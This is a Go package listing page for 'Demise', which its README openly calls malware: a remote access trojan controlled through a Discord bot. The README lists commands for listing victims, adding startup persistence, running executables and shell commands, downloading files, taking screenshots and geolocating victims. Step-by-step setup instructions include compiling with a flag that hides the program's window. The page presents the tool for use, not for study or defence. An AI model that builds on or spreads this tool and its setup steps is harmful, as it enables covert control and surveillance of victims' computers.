demise

command module
v0.0.0-...-19f18fc Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Oct 23, 2024 License: GPL-3.0 Imports: 18 Imported by: 0

README

Demise

Demise is Golang malware that uses Discord for communication.

image

Demo

image

Commands

  • show victims connected $victims

  • extract a zip file $unzip <username> <.zip file on drive> <directory to extract in>

  • run Demise on startup $startup <username>

  • run an executable (some executables require admin) $run <username> <location of exe>

  • download file $dl <username> <url> <name of file>

  • run commands $shell <username> <command> <flags... optional>

  • screenshot desktop $ss <username>

  • get IP $ip <username>

  • kill session $kill <username>

  • geolocate $geoloc <username>

HOWTO

  1. Download the source code
  2. Download golang https://go.dev choose the correct install for your os
  3. make a server (this is a discord bot RAT)
  4. make a bot. I won't show you how because there are many tutorial on youtube https://www.youtube.com/watch?v=7A-bnPlxj4k&t=20s
  5. add the bot to your server and make a new text channel in your server
  6. copy your bot's token and the id of the text channel you just created image
  7. put the channel id here at the beginning of the source code image
  8. put your bot's token here
  9. compile with a command similiar to this one go build -ldflags="-s -w -H=windowsgui" . -H=windowsgui will hide the window

if the bot doesn't respond to commands change your intents

Documentation

The Go Gopher

There is no documentation for this package.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL